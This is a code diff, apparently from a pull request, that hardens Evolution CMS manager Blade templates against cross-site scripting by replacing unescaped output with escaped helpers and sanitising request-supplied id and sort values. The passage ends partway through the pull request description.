                     <h3 data-toggle="collapse" data-target=".alinkcolors"><i
                                 class="togglearrow {{ $_style['icon_chevron_right'] }}" aria-hidden="true"></i>
-                        {!! iconHtml($_style['icon_chain'], ' aria-hidden="true"') !!} Links Color</h3> <a
+                        {{ icon_html($_style['icon_chain'], ' aria-hidden="true"') }} Links Color</h3> <a
                             title="{{ ManagerTheme::getLexicon('reset') }}" href="javascript:;"
                             onclick="cleanLocalStorageReloadMain('my_evo_alinkcolor')"
                             class="pull-right resetcolor btn btn-secondary"><i

--- a/manager/views/frame/tree.blade.php
+++ b/manager/views/frame/tree.blade.php
@@ -28,16 +28,16 @@ $_style['icon_trash'] = svg('tabler-trash')->toHtml();
 
 <div class="treeframebody">
     <div id="treeMenu">
-        <a class="treeButton" id="treeMenu_expandtree" onclick="evo.tree.expandTree();" title="{{ ManagerTheme::getLexicon('expand_tree') }}">{!! $_style['icon_arrow_down_circle'] !!}</a>
-        <a class="treeButton" id="treeMenu_collapsetree" onclick="evo.tree.collapseTree();" title="{{ ManagerTheme::getLexicon('collapse_tree') }}">{!! $_style['icon_arrow_up_circle'] !!}</a>
+        <a class="treeButton" id="treeMenu_expandtree" onclick="evo.tree.expandTree();" title="{{ ManagerTheme::getLexicon('expand_tree') }}">{{ icon_html($_style['icon_arrow_down_circle']) }}</a>
+        <a class="treeButton" id="treeMenu_collapsetree" onclick="evo.tree.collapseTree();" title="{{ ManagerTheme::getLexicon('collapse_tree') }}">{{ icon_html($_style['icon_arrow_up_circle']) }}</a>
         @if(evo()->hasPermission('new_document'))
-            <a class="treeButton" id="treeMenu_addresource" onclick="evo.tabs({url:'{{ EVO_MANAGER_URL }}?a=4', title: '{{ ManagerTheme::getLexicon('add_resource') }}'});" title="{{ ManagerTheme::getLexicon('add_resource') }}">{!! $_style['icon_add'] !!}</a>
-            <a class="treeButton" id="treeMenu_addweblink" onclick="evo.tabs({url:'{{ EVO_MANAGER_URL }}?a=72', title: '{{ ManagerTheme::getLexicon('add_weblink') }}'});" title="{{ ManagerTheme::getLexicon('add_weblink') }}">{!! $_style['icon_chain_broken'] !!}</a>
+            <a class="treeButton" id="treeMenu_addresource" onclick="evo.tabs({url:'{{ EVO_MANAGER_URL }}?a=4', title: '{{ ManagerTheme::getLexicon('add_resource') }}'});" title="{{ ManagerTheme::getLexicon('add_resource') }}">{{ icon_html($_style['icon_add']) }}</a>
+            <a class="treeButton" id="treeMenu_addweblink" onclick="evo.tabs({url:'{{ EVO_MANAGER_URL }}?a=72', title: '{{ ManagerTheme::getLexicon('add_weblink') }}'});" title="{{ ManagerTheme::getLexicon('add_weblink') }}">{{ icon_html($_style['icon_chain_broken']) }}</a>
         @endif
-        <a class="treeButton" id="treeMenu_refreshtree" onclick="evo.tree.restoreTree();" title="{{ ManagerTheme::getLexicon('refresh_tree') }}">{!! $_style['icon_refresh'] !!}</a>
-        <a class="treeButton" id="treeMenu_sortingtree" onclick="evo.tree.showSorter(event);" title="{{ ManagerTheme::getLexicon('sort_tree') }}">{!! $_style['icon_sort'] !!}</a>
+        <a class="treeButton" id="treeMenu_refreshtree" onclick="evo.tree.restoreTree();" title="{{ ManagerTheme::getLexicon('refresh_tree') }}">{{ icon_html($_style['icon_refresh']) }}</a>
+        <a class="treeButton" id="treeMenu_sortingtree" onclick="evo.tree.showSorter(event);" title="{{ ManagerTheme::getLexicon('sort_tree') }}">{{ icon_html($_style['icon_sort']) }}</a>
         @if(evo()->hasPermission('edit_document') && evo()->hasPermission('save_document'))
-            <a class="treeButton" id="treeMenu_sortingindex" onclick="evo.tree.openSortMenuIndex();" title="{{ ManagerTheme::getLexicon('sort_menuindex') }}">{!! $_style['icon_sort_num_asc'] !!}</a>
+            <a class="treeButton" id="treeMenu_sortingindex" onclick="evo.tree.openSortMenuIndex();" title="{{ ManagerTheme::getLexicon('sort_menuindex') }}">{{ icon_html($_style['icon_sort_num_asc']) }}</a>
         @endif
         {{-- @if(evo()->getConfig('use_browser') && evo()->hasPermission('assets_images'))
             <a class="treeButton" id="treeMenu_openimages" title="{{ ManagerTheme::getLexicon('images_management') }}&#013;{{ ManagerTheme::getLexicon('em_button_shift') }}"><i class="{{ $_style['icon_camera'] }}"></i></a>
@@ -46,7 +46,7 @@ $_style['icon_trash'] = svg('tabler-trash')->toHtml();
             <a class="treeButton" id="treeMenu_openfiles" title="{{ ManagerTheme::getLexicon('files_management') }}&#013;{{ ManagerTheme::getLexicon('em_button_shift') }}"><i class="{{ $_style['icon_files'] }}"></i></a>
         @endif --}}
         @if(evo()->hasPermission('empty_trash'))
-            <a class="treeButton treeButtonDisabled" id="treeMenu_emptytrash" title="{{ ManagerTheme::getLexicon('empty_recycle_bin_empty') }}">{!! $_style['icon_trash'] !!}</a>
+            <a class="treeButton treeButtonDisabled" id="treeMenu_emptytrash" title="{{ ManagerTheme::getLexicon('empty_recycle_bin_empty') }}">{{ icon_html($_style['icon_trash']) }}</a>
         @endif
         {{-- <a class="treeButton" id="treeMenu_theme_dark" onclick="evo.tree.toggleTheme(event)" title="{{ ManagerTheme::getLexicon('manager_theme_mode_title') }}"><i class="{{ $_style['icon_theme'] }}"></i></a> --}}
     </div>

--- a/manager/views/page/3.blade.php
+++ b/manager/views/page/3.blade.php
@@ -43,20 +43,23 @@
     }
     $content = $content->toArray();
 
-    $sd = isset($_REQUEST['dir']) ? '&dir=' . $_REQUEST['dir'] : '&dir=DESC';
-    $sb = isset($_REQUEST['sort']) ? '&sort=' . $_REQUEST['sort'] : '&sort=createdon';
+    // The requested id/sort/dir end up inside generated links and inside the JS action handlers
+    // below, so they are normalised here instead of being trusted as-is.
+    $requestId = (int) get_by_key($_REQUEST, 'id', 0);
+    $sd = '&dir=' . sort_direction(get_by_key($_REQUEST, 'dir'));
+    $sb = '&sort=' . sort_column(get_by_key($_REQUEST, 'sort'));
     $pg = isset($_REQUEST['page']) ? '&page=' . (int) $_REQUEST['page'] : '';
     $add_path = $sd . $sb . $pg;
 
     $actions = [
-        'new'       => 'index.php?pid=' . $_REQUEST['id'] . '&a=4',
-        'newlink'   => 'index.php?pid=' . $_REQUEST['id'] . '&a=72',
-        'edit'      => 'index.php?id=' . $_REQUEST['id'] . '&a=27',
+        'new'       => 'index.php?pid=' . $requestId . '&a=4',
+        'newlink'   => 'index.php?pid=' . $requestId . '&a=72',
+        'edit'      => 'index.php?id=' . $requestId . '&a=27',
         'save'      => '',
-        'delete'    => 'index.php?id=' . $_REQUEST['id'] . '&a=6',
+        'delete'    => 'index.php?id=' . $requestId . '&a=6',
         'cancel'    => 'index.php?' . ($id == 0 ? 'a=2' : 'a=3&r=1&id=' . $id . $add_path),
-        'move'      => 'index.php?id=' . $_REQUEST['id'] . '&a=51',
-        'duplicate' => 'index.php?id=' . $_REQUEST['id'] . '&a=94',
+        'move'      => 'index.php?id=' . $requestId . '&a=51',
+        'duplicate' => 'index.php?id=' . $requestId . '&a=94',
         'view'      => evo()->getConfig('friendly_urls') ? UrlProcessor::makeUrl($id) : EVO_SITE_URL . 'index.php?id=' . $id,
     ];
 
@@ -122,8 +125,9 @@
 
         $numRecords = $childs->count();
 
-        $sort = isset($_REQUEST['sort']) ? $_REQUEST['sort'] : 'createdon';
-        $dir = isset($_REQUEST['dir']) ? $_REQUEST['dir'] : 'DESC';
+        // Both values reach orderBy() and the paging links, so only plain identifiers survive.
+        $sort = sort_column(get_by_key($_REQUEST, 'sort'));
+        $dir = sort_direction(get_by_key($_REQUEST, 'dir'));
         $pg = isset($_REQUEST['page']) ? (int) $_REQUEST['page'] - 1 : 0;
 
         // Get child documents (with paging)
@@ -262,13 +266,13 @@
     <script type="text/javascript">
         var actions = {
             new: function () {
-                document.location.href = "{!! $actions['new'] !!}";
+                document.location.href = @js($actions['new']);
             },
             newlink: function () {
-                document.location.href = "{!! $actions['newlink'] !!}";
+                document.location.href = @js($actions['newlink']);
             },
             edit: function () {
-                document.location.href = "{!! $actions['edit'] !!}";
+                document.location.href = @js($actions['edit']);
             },
             save: function () {
                 documentDirty = false;
@@ -276,24 +280,24 @@
                 document.mutate.save.click();
             },
             delete: function () {
-                if (confirm("{{ ManagerTheme::getLexicon('confirm_delete_resource') }}") === true) {
-                    document.location.href = "{!! $actions['delete'] !!}";
+                if (confirm(@js(ManagerTheme::getLexicon('confirm_delete_resource'))) === true) {
+                    document.location.href = @js($actions['delete']);
                 }
             },
             cancel: function () {
                 documentDirty = false;
-                document.location.href = "{!! $actions['cancel'] !!}";
+                document.location.href = @js($actions['cancel']);
             },
             move: function () {
-                document.location.href = "{!! $actions['move'] !!}";
+                document.location.href = @js($actions['move']);
             },
             duplicate: function () {
-                if (confirm("{{ ManagerTheme::getLexicon('confirm_resource_duplicate') }}") === true) {
-                    document.location.href = "{!! $actions['duplicate'] !!}";
+                if (confirm(@js(ManagerTheme::getLexicon('confirm_resource_duplicate'))) === true) {
+                    document.location.href = @js($actions['duplicate']);
                 }
             },
             view: function () {
-                window.open("{!! $actions['view'] !!}", "previewWin");
+                window.open(@js($actions['view']), "previewWin");
             }
         };
     </script>

--- a/manager/views/page/chunk.blade.php
+++ b/manager/views/page/chunk.blade.php
@@ -76,7 +76,7 @@
         @include('manager::partials.actionButtons', $actionButtons)
 
         <div class="container element-edit-message">
-            <div class="alert alert-info">{!! ManagerTheme::getLexicon('htmlsnippet_msg') !!}</div>
+            <div class="alert alert-info">{{ ManagerTheme::lexiconHtml('htmlsnippet_msg') }}</div>
         </div>
 
         <div class="tab-pane" id="chunkPane">

--- a/manager/views/page/eventlog_details.blade.php
+++ b/manager/views/page/eventlog_details.blade.php
@@ -20,7 +20,7 @@
         {{ ManagerTheme::getLexicon('eventlog') }}
     </h1>
 
-    {!! ManagerTheme::getStyle('actionbuttons.dynamic.canceldelete') !!}
+    {{ ManagerTheme::styleHtml('actionbuttons.dynamic.canceldelete') }}
 
     <?php /** @var EvolutionCMS\Models\EventLog $log */?>
     @if($log->exists)
@@ -65,7 +65,7 @@
                         </tr>
                         <tr>
                             <td width="100%" colspan="4"><br />
-                                {!! $log->description !!}
+                                {{ $log->descriptionHtml() }}
                                 @if($log->isMailSentType() && $log->mailBody() !== null)
                                     <hr />
                                     <iframe

--- a/manager/views/page/modules.blade.php
+++ b/manager/views/page/modules.blade.php
@@ -6,10 +6,10 @@
                 class="<?= ManagerTheme::getStyle('icon_question_circle') ?> help"></i>
     </h1>
 
-    {!! ManagerTheme::getStyle('actionbuttons.dynamic.newmodule') !!}
+    {{ ManagerTheme::styleHtml('actionbuttons.dynamic.newmodule') }}
 
     <div class="container element-edit-message">
-        <div class="alert alert-info">{!! __('global.module_management_msg') !!}</div>
+        <div class="alert alert-info">{{ ManagerTheme::lexiconHtml('module_management_msg') }}</div>
     </div>
 
     <div class="tab-page">
@@ -30,10 +30,10 @@
                             <td class="tableItem text-center" style="width: 34px;">
                                 @if(evo()->hasAnyPermissions(['edit_module', 'exec_module']))
                                     <a class="tableRowIcon" href="javascript:;" onclick="return showContentMenu({{ $module->getKey() }}, event);" title="{{ __('global.click_to_context') }}">
-                                        <i class="{!! !empty($module->icon) ? $module->icon : 'fa fa-cube' !!}"></i>
+                                        <i class="{{ !empty($module->icon) ? $module->icon : 'fa fa-cube' }}"></i>
                                     </a>
                                 @else
-                                    <i class="{!! !empty($module->icon) ? $module->icon : 'fa fa-cube' !!}"></i>
+                                    <i class="{{ !empty($module->icon) ? $module->icon : 'fa fa-cube' }}"></i>
                                 @endif
                             </td>
                             <td class="tableItem">
@@ -43,7 +43,7 @@
                                     {{ $module->name }}
                                 @endif
                             </td>
-                            <td class="tableItem">{!! $module->description !!}</td>
+                            <td class="tableItem">{{ safe_html($module->description) }}</td>
                             <td class="tableItem text-center" style="width: 60px;">
                                 @if($module->locked)
                                     {{ __('global.yes') }}

--- a/manager/views/page/move_document.blade.php
+++ b/manager/views/page/move_document.blade.php
@@ -57,7 +57,7 @@
         <i class="{{ $_style['icon_move'] }}"></i>{{ $document->pagetitle }} <small>({{ $document->getKey() }})</small>
     </h1>
 
-    {!! ManagerTheme::getStyle('actionbuttons.dynamic.save') !!}
+    {{ ManagerTheme::styleHtml('actionbuttons.dynamic.save') }}
 
     <div class="tab-page">
         <div class="container container-body">

--- a/manager/views/page/plugin.blade.php
+++ b/manager/views/page/plugin.blade.php
@@ -211,7 +211,7 @@
                             ])
                             {{ ManagerTheme::getLexicon('parse_docblock') }}
                         </label>
-                        <small class="form-text text-muted">{!! ManagerTheme::getLexicon('parse_docblock_msg') !!}</small>
+                        <small class="form-text text-muted">{{ ManagerTheme::lexiconHtml('parse_docblock_msg') }}</small>
                     </div>
                 </div>
 

--- a/manager/views/page/plugin_priority.blade.php
+++ b/manager/views/page/plugin_priority.blade.php
@@ -24,7 +24,7 @@
         <i class="{{ $_style['icon_sort_num_asc'] }}"></i>{{ ManagerTheme::getLexicon('plugin_priority_title') }}
     </h1>
 
-    {!! ManagerTheme::getStyle('actionbuttons.dynamic.save') !!}
+    {{ ManagerTheme::styleHtml('actionbuttons.dynamic.save') }}
 
     <div class="tab-page">
         <div class="container container-body">

--- a/manager/views/page/refresh_site.blade.php
+++ b/manager/views/page/refresh_site.blade.php
@@ -12,10 +12,10 @@
     <div class="tab-page">
         <div class="container container-body">
             @if($num_rows_pub)
-                <p>{!! sprintf(ManagerTheme::getLexicon('refresh_published'), (int)$num_rows_pub) !!}</p>
+                <p>{{ ManagerTheme::lexiconHtml('refresh_published', [(int)$num_rows_pub]) }}</p>
             @endif
             @if($num_rows_unpub)
-                <p>{!! sprintf(ManagerTheme::getLexicon('refresh_unpublished'), (int)$num_rows_unpub) !!}</p>
+                <p>{{ ManagerTheme::lexiconHtml('refresh_unpublished', [(int)$num_rows_unpub]) }}</p>
             @endif
             {!! $cache_log !!}
         </div>

--- a/manager/views/page/resources.blade.php
+++ b/manager/views/page/resources.blade.php
@@ -2,8 +2,8 @@
 
 @push('scripts.bot')
     <script>
-        var trans = {!! json_encode($unlockTranslations, JSON_UNESCAPED_UNICODE) !!},
-            mraTrans = {!! json_encode($mraTranslations, JSON_UNESCAPED_UNICODE) !!};
+        var trans = @js($unlockTranslations),
+            mraTrans = @js($mraTranslations);
     </script>
     <script src="media/script/jquery.quicksearch.js"></script>
     <script src="media/script/bootstrap/js/bootstrap.min.js"></script>

--- a/manager/views/page/resources/chunks.blade.php
+++ b/manager/views/page/resources/chunks.blade.php
@@ -5,7 +5,7 @@
     <script>tpResources.addTabPage(document.getElementById('{{ $tabIndexPageName }}'));</script>
 
     <div id="{{ $tabIndexPageName }}-info" class="msg-container" style="display:none">
-        <div class="element-edit-message-tab">{!! ManagerTheme::getLexicon('htmlsnippet_management_msg') !!}</div>
+        <div class="element-edit-message-tab">{{ ManagerTheme::lexiconHtml('htmlsnippet_management_msg') }}</div>
         <p class="viewoptions-message">{{ ManagerTheme::getLexicon('view_options_msg') }}</p>
     </div>
 

--- a/manager/views/page/resources/elements/chunk.blade.php
+++ b/manager/views/page/resources/elements/chunk.blade.php
@@ -21,7 +21,7 @@
                         <small>({{ $item->id }})</small>
                         <span class="elements_descr">
                             {{ $item->caption }}
-                            {!! $item->description !!}
+                            {{ safe_html($item->description) }}
                         </span>
                     </a>
                     @if(ManagerTheme::getTextDir() !== 'ltr')

--- a/manager/views/page/resources/elements/module.blade.php
+++ b/manager/views/page/resources/elements/module.blade.php
@@ -29,7 +29,7 @@
                         <small>({{ $item->id }})</small>
                         <span class="elements_descr">
                             {{ $item->caption }}
-                            {!! $item->description !!}
+                            {{ safe_html($item->description) }}
                         </span>
                     @if(empty($action))
                         </span>

--- a/manager/views/page/resources/elements/plugin.blade.php
+++ b/manager/views/page/resources/elements/plugin.blade.php
@@ -21,7 +21,7 @@
                         <small>({{ $item->id }})</small>
                         <span class="elements_descr">
                             {{ $item->caption }}
-                            {!! $item->description !!}
+                            {{ safe_html($item->description) }}
                         </span>
                     </a>
                     @if(ManagerTheme::getTextDir() !== 'ltr')

--- a/manager/views/page/resources/elements/snippet.blade.php
+++ b/manager/views/page/resources/elements/snippet.blade.php
@@ -21,7 +21,7 @@
                         <small>({{ $item->id }})</small>
                         <span class="elements_descr">
                             {{ $item->caption }}
-                            {!! $item->description !!}
+                            {{ safe_html($item->description) }}
                         </span>
                     </a>
                     @if(ManagerTheme::getTextDir() !== 'ltr')

--- a/manager/views/page/resources/elements/template.blade.php
+++ b/manager/views/page/resources/elements/template.blade.php
@@ -21,7 +21,7 @@
                         <small>({{ $item->id }})</small>
                         <span class="elements_descr">
                             {{ $item->caption }}
-                            {!! $item->description !!}
+                            {{ safe_html($item->description) }}
                         </span>
                     </a>
                     @if(ManagerTheme::getTextDir() !== 'ltr')

--- a/manager/views/page/resources/elements/tv.blade.php
+++ b/manager/views/page/resources/elements/tv.blade.php
@@ -21,7 +21,7 @@
                         <small>({{ $item->id }})</small>
                         <span class="elements_descr">
                             {{ $item->caption }}
-                            {!! $item->description !!}
+                            {{ safe_html($item->description) }}
                         </span>
                     </a>
                     @if(ManagerTheme::getTextDir() !== 'ltr')

--- a/manager/views/page/resources/modules.blade.php
+++ b/manager/views/page/resources/modules.blade.php
@@ -6,7 +6,7 @@
     <script>tpResources.addTabPage(document.getElementById('{{ $tabIndexPageName }}'));</script>
 
     <div id="{{ $tabIndexPageName }}-info" class="msg-container" style="display:none">
-        <div class="element-edit-message-tab">{!! ManagerTheme::getLexicon('module_management_msg') !!}</div>
+        <div class="element-edit-message-tab">{{ ManagerTheme::lexiconHtml('module_management_msg') }}</div>
         <p class="viewoptions-message">{{ ManagerTheme::getLexicon('view_options_msg') }}</p>
     </div>
 

--- a/manager/views/page/resources/plugins.blade.php
+++ b/manager/views/page/resources/plugins.blade.php
@@ -6,7 +6,7 @@
     <script>tpResources.addTabPage(document.getElementById('{{ $tabIndexPageName }}'));</script>
 
     <div id="{{ $tabIndexPageName }}-info" class="msg-container" style="display:none">
-        <div class="element-edit-message-tab">{!! ManagerTheme::getLexicon('plugin_management_msg') !!}</div>
+        <div class="element-edit-message-tab">{{ ManagerTheme::lexiconHtml('plugin_management_msg') }}</div>
         <p class="viewoptions-message">{{ ManagerTheme::getLexicon('view_options_msg') }}</p>
     </div>
 
@@ -30,7 +30,7 @@
                     @endif
                     <a class="btn btn-secondary" href="javascript:;" id="{{ $tabIndexPageName }}-help">
                         <i class="{{ $_style['icon_question_circle'] }}"></i>
-                        <span>{!! ManagerTheme::getLexicon('help') !!}</span>
+                        <span>{{ ManagerTheme::lexiconHtml('help') }}</span>
                     </a>
                     <a class="btn btn-secondary switchform-btn" href="javascript:;" data-target="switchForm_{{ $tabIndexPageName }}">
                         <i class="{{ $_style['icon_bars'] }}"></i>

--- a/manager/views/page/resources/snippets.blade.php
+++ b/manager/views/page/resources/snippets.blade.php
@@ -5,7 +5,7 @@
     <script>tpResources.addTabPage(document.getElementById('{{ $tabIndexPageName }}'));</script>
 
     <div id="{{ $tabIndexPageName }}-info" class="msg-container" style="display:none">
-        <div class="element-edit-message-tab">{!! ManagerTheme::getLexicon('snippet_management_msg') !!}</div>
+        <div class="element-edit-message-tab">{{ ManagerTheme::lexiconHtml('snippet_management_msg') }}</div>
         <p class="viewoptions-message">{{ ManagerTheme::getLexicon('view_options_msg') }}</p>
     </div>
 

--- a/manager/views/page/resources/templates.blade.php
+++ b/manager/views/page/resources/templates.blade.php
@@ -6,7 +6,7 @@
     <script>tpResources.addTabPage(document.getElementById('{{ $tabIndexPageName }}'));</script>
 
     <div id="{{ $tabIndexPageName }}-info" class="msg-container" style="display:none">
-        <div class="element-edit-message-tab">{!! ManagerTheme::getLexicon('template_management_msg') !!}</div>
+        <div class="element-edit-message-tab">{{ ManagerTheme::lexiconHtml('template_management_msg') }}</div>
         <p class="viewoptions-message">{{ ManagerTheme::getLexicon('view_options_msg') }}</p>
     </div>
 

--- a/manager/views/page/resources/tv.blade.php
+++ b/manager/views/page/resources/tv.blade.php
@@ -6,8 +6,8 @@
     <script>tpResources.addTabPage(document.getElementById('{{ $tabIndexPageName }}'));</script>
 
     <div id="{{ $tabIndexPageName }}-info" class="msg-container" style="display:none">
-        <div class="element-edit-message-tab">{!! ManagerTheme::getLexicon('tmplvars_management_msg') !!}</div>
-        <p class="viewoptions-message">{!! ManagerTheme::getLexicon('view_options_msg') !!}</p>
+        <div class="element-edit-message-tab">{{ ManagerTheme::lexiconHtml('tmplvars_management_msg') }}</div>
+        <p class="viewoptions-message">{{ ManagerTheme::lexiconHtml('view_options_msg') }}</p>
     </div>
 
     <div id="_actions">

--- a/manager/views/page/role_management.blade.php
+++ b/manager/views/page/role_management.blade.php
@@ -2,8 +2,8 @@
 
 @push('scripts.bot')
     <script>
-        var trans = {!! json_encode($unlockTranslations, JSON_UNESCAPED_UNICODE) !!},
-            mraTrans = {!! json_encode($mraTranslations, JSON_UNESCAPED_UNICODE) !!};
+        var trans = @js($unlockTranslations),
+            mraTrans = @js($mraTranslations);
     </script>
     <script src="media/script/jquery.quicksearch.js"></script>
     <script src="media/script/bootstrap/js/bootstrap.min.js"></script>

--- a/manager/views/page/search.blade.php
+++ b/manager/views/page/search.blade.php
@@ -130,13 +130,13 @@
                                     @if(!empty($row['results']))
                                         <li>
                                             <b>
-                                                <i class="{{ $row['class'] }}"></i> {!! $row['title'] !!}
+                                                <i class="{{ $row['class'] }}"></i> {{ $row['title'] }}
                                             </b>
                                         </li>
                                         @foreach($row['results'] as $item)
                                             <li class="{{ $item['class'] }}">
                                                 <a href="{{ $item['url'] }}" id="{{ $k }}_{{ $item['id'] }}" target="main">
-                                                    {!! $item['title'] !!}
+                                                    {{ $item['title'] }}
                                                     <i class="{{ ManagerTheme::getStyle('icon_external_link') }}"></i>
                                                 </a>
                                             </li>

--- a/manager/views/page/snippet.blade.php
+++ b/manager/views/page/snippet.blade.php
@@ -76,7 +76,7 @@
         @include('manager::partials.actionButtons', $actionButtons)
 
         <div class="container element-edit-message">
-            <div class="alert alert-info">{!! ManagerTheme::getLexicon('snippet_msg') !!}</div>
+            <div class="alert alert-info">{{ ManagerTheme::lexiconHtml('snippet_msg') }}</div>
         </div>
 
         <div class="tab-pane" id="snipetPane">
@@ -169,7 +169,7 @@
                             ])
                             {{ ManagerTheme::getLexicon('parse_docblock') }}
                         </label>
-                        <small class="form-text text-muted">{!! ManagerTheme::getLexicon('parse_docblock_msg') !!}</small>
+                        <small class="form-text text-muted">{{ ManagerTheme::lexiconHtml('parse_docblock_msg') }}</small>
                     </div>
                 </div>
 

--- a/manager/views/page/system_settings.blade.php
+++ b/manager/views/page/system_settings.blade.php
@@ -26,7 +26,7 @@
         @include('manager::partials.actionButtons', $actionButtons)
         @if(!get_by_key(EvolutionCMS()->config, 'settings_version') || get_by_key(EvolutionCMS()->config, 'settings_version') !== EvolutionCMS()->getVersionData('version'))
             <div class="container">
-                <p class="alert alert-warning">{!! ManagerTheme::getLexicon('settings_after_install') !!}</p>
+                <p class="alert alert-warning">{{ ManagerTheme::lexiconHtml('settings_after_install') }}</p>
             </div>
         @endif
         <div class="tab-pane" id="settingsPane">

--- a/manager/views/page/template/tv.blade.php
+++ b/manager/views/page/template/tv.blade.php
@@ -10,7 +10,7 @@
         ])
         {{ $item->name }}
         <small>({{ $item->getKey() }})</small>
-        - {!! $item->caption !!}
+        - {{ $item->caption }}
     </label>
     @if(!empty($item->locked))
         <em>({{ ManagerTheme::getLexicon('locked') }})</em>

--- a/manager/views/page/tmplvar.blade.php
+++ b/manager/views/page/tmplvar.blade.php
@@ -303,7 +303,7 @@
         @include('manager::partials.actionButtons', $actionButtons)
 
         <div class="container element-edit-message">
-            <div class="alert alert-info">{!! ManagerTheme::getLexicon('tmplvars_msg') !!}</div>
+            <div class="alert alert-info">{{ ManagerTheme::lexiconHtml('tmplvars_msg') }}</div>
         </div>
 
         <div class="tab-pane" id="tmplvarsPane">
@@ -617,7 +617,7 @@
         </div>
     </form>
     <script>
-        var savedProperties = {!! json_encode($data->properties) !!};
+        var savedProperties = @js($data->properties);
         setTimeout(function () {
             showParameters();
             elementProperties.showParameters();

--- a/manager/views/page/tmplvar/role.blade.php
+++ b/manager/views/page/tmplvar/role.blade.php
@@ -11,7 +11,7 @@
         {{ $item->name }}
         <small>({{ $item->getKey() }})</small>
         @if(!empty($item->description))
-            - {!! $item->description !!}
+            - {{ safe_html($item->description) }}
         @endif
     </label>
 </li>

--- a/manager/views/page/tmplvar/template.blade.php
+++ b/manager/views/page/tmplvar/template.blade.php
@@ -11,7 +11,7 @@
         {{ $item->name }}
         <small>({{ $item->getKey() }})</small>
         @if(!empty($item->description))
-            - {!! $item->description !!}
+            - {{ safe_html($item->description) }}
         @endif
         @if(!empty($item->locked))
             <em>({{ ManagerTheme::getLexicon('locked') }})</em>

--- a/manager/views/page/update_tree.blade.php
+++ b/manager/views/page/update_tree.blade.php
@@ -15,19 +15,19 @@
         <i class="{{ ManagerTheme::getStyle('icon_sitemap') }}"></i>{{ ManagerTheme::getLexicon('update_tree') }}
     </h1>
     <div class="tab-page">
-    {!! ManagerTheme::getStyle('actionbuttons.static.cancel') !!}
+    {{ ManagerTheme::styleHtml('actionbuttons.static.cancel') }}
 
 
 
             <div class="container container-body">
                 <p>
-                    {!! ManagerTheme::getLexicon('update_tree_description') !!}
+                    {{ ManagerTheme::lexiconHtml('update_tree_description') }}
                 </p>
                 @if($count < 3000)
 
                     @if($finish == 1)
                         <div class="alert alert-success" role="alert">
-                            {!! sprintf(ManagerTheme::getLexicon('update_tree_time'), $count, $end) !!}
+                            {{ ManagerTheme::lexiconHtml('update_tree_time', [$count, $end]) }}
                         </div>
                     @endif
 
@@ -38,7 +38,7 @@
 
                 @else
                     <div class="alert alert-danger" role="alert">
-                        {!! ManagerTheme::getLexicon('update_tree_danger') !!}
+                        {{ ManagerTheme::lexiconHtml('update_tree_danger') }}
                     </div>
                 @endif
             </div>

--- a/manager/views/page/user_roles/element_permission.blade.php
+++ b/manager/views/page/user_roles/element_permission.blade.php
@@ -21,7 +21,7 @@
                         <small>({{ $item->id }})</small>
                         <span class="elements_descr">
                             {{ $item->caption }}
-                            {!! $item->description !!}
+                            {{ safe_html($item->description) }}
                         </span>
                     </a>
                     @if(ManagerTheme::getTextDir() !== 'ltr')

--- a/manager/views/page/user_roles/permission.blade.php
+++ b/manager/views/page/user_roles/permission.blade.php
@@ -10,7 +10,7 @@
                     <i class="fa fa-user-tag"></i>@if(isset($permission->name)){{$permission->name}} <small>({{$permission->id}})</small> @else {{ ManagerTheme::getLexicon('permission_title') }}@endif
                 </h1>
 
-                {!!  ManagerTheme::getStyle('actionbuttons.dynamic.savedelete')  !!}
+                {{ ManagerTheme::styleHtml('actionbuttons.dynamic.savedelete') }}
 
                 <div class="tab-page">
                     <div class="container container-body">

--- a/manager/views/page/user_roles/permissions_groups.blade.php
+++ b/manager/views/page/user_roles/permissions_groups.blade.php
@@ -10,7 +10,7 @@
                     <i class="fa fa-user-tag"></i>@if(isset($groups->name)){{$groups->name}} <small>({{$groups->id}})</small> @else {{ ManagerTheme::getLexicon('groups_permission_title') }}@endif
                 </h1>
 
-                {!!  ManagerTheme::getStyle('actionbuttons.dynamic.savedelete')  !!}
+                {{ ManagerTheme::styleHtml('actionbuttons.dynamic.savedelete') }}
 
                 <div class="tab-page">
                     <div class="container container-body">

--- a/manager/views/page/user_roles/role_management.blade.php
+++ b/manager/views/page/user_roles/role_management.blade.php
@@ -7,7 +7,7 @@
 
     <div class="">
         <div class="form-group">
-            {!! ManagerTheme::getLexicon('role_management_msg') !!}
+            {{ ManagerTheme::lexiconHtml('role_management_msg') }}
             <a class="btn btn-secondary btn-sm" href="{{ (new EvolutionCMS\Models\UserRole)->makeUrl('actions.new') }}">
                 <i class="{{ $_style['icon_add'] }} hide4desktop"></i> {{ ManagerTheme::getLexicon('new_role') }}
             </a>

--- a/manager/views/page/user_roles/user_role.blade.php
+++ b/manager/views/page/user_roles/user_role.blade.php
@@ -10,7 +10,7 @@
             <i class="{{ $_style['icon_role'] }}"></i>@if(isset($role->name)){{$role->name}} <small>({{$role->id}})</small> @else {{ ManagerTheme::getLexicon('role_title') }}@endif
         </h1>
 
-        {!!  ManagerTheme::getStyle('actionbuttons.dynamic.savedelete')  !!}
+        {{ ManagerTheme::styleHtml('actionbuttons.dynamic.savedelete') }}
 
         <div class="tab-pane" id="rolePane">
             <script>

--- a/manager/views/page/users/message_after_save.blade.php
+++ b/manager/views/page/users/message_after_save.blade.php
@@ -17,7 +17,7 @@
         <div class="tab-page">
             <div class="container container-body" id="disp">
                 <p>
-                    {!! \Lang::get('global.password_msg', ['username' => $username, 'password'=>$password]) !!}
+                    {{ $passwordMessage }}
                 </p>
             </div>
         </div>

--- a/manager/views/partials/header.blade.php
+++ b/manager/views/partials/header.blade.php
@@ -42,16 +42,16 @@
             timerForUnload,
             managerPath = '';
 
-        evo.lang = {!! json_encode(Illuminate\Support\Arr::only(
+        evo.lang = @js(Illuminate\Support\Arr::only(
             ManagerTheme::getLexicon(),
             ['saving', 'error_internet_connection', 'warning_not_saved']
-        )) !!};
-        evo.style = {!! json_encode(Illuminate\Support\Arr::only(
+        ));
+        evo.style = @js(Illuminate\Support\Arr::only(
             ManagerTheme::getStyle(),
             ['icon_file', 'icon_pencil', 'icon_reply', 'icon_plus']
-        )) !!};
+        ));
         evo.EVO_MANAGER_URL = '{{EVO_MANAGER_URL}}';
-        evo.config.which_browser = '{{evo()->getConfig('which_browser')}}';
+        evo.config.which_browser = @js(evo()->getConfig('which_browser'));
         // ============================================
         // @deprecated
         // @since 3.5.2


### PR DESCRIPTION
  {!! in manager/views/ went from 200 → 72. Every removal is backed by a source-side fix so nothing is double-encoded or lost; the 72 that remain are categorised below with the reason.

  The mechanism used as the alternative

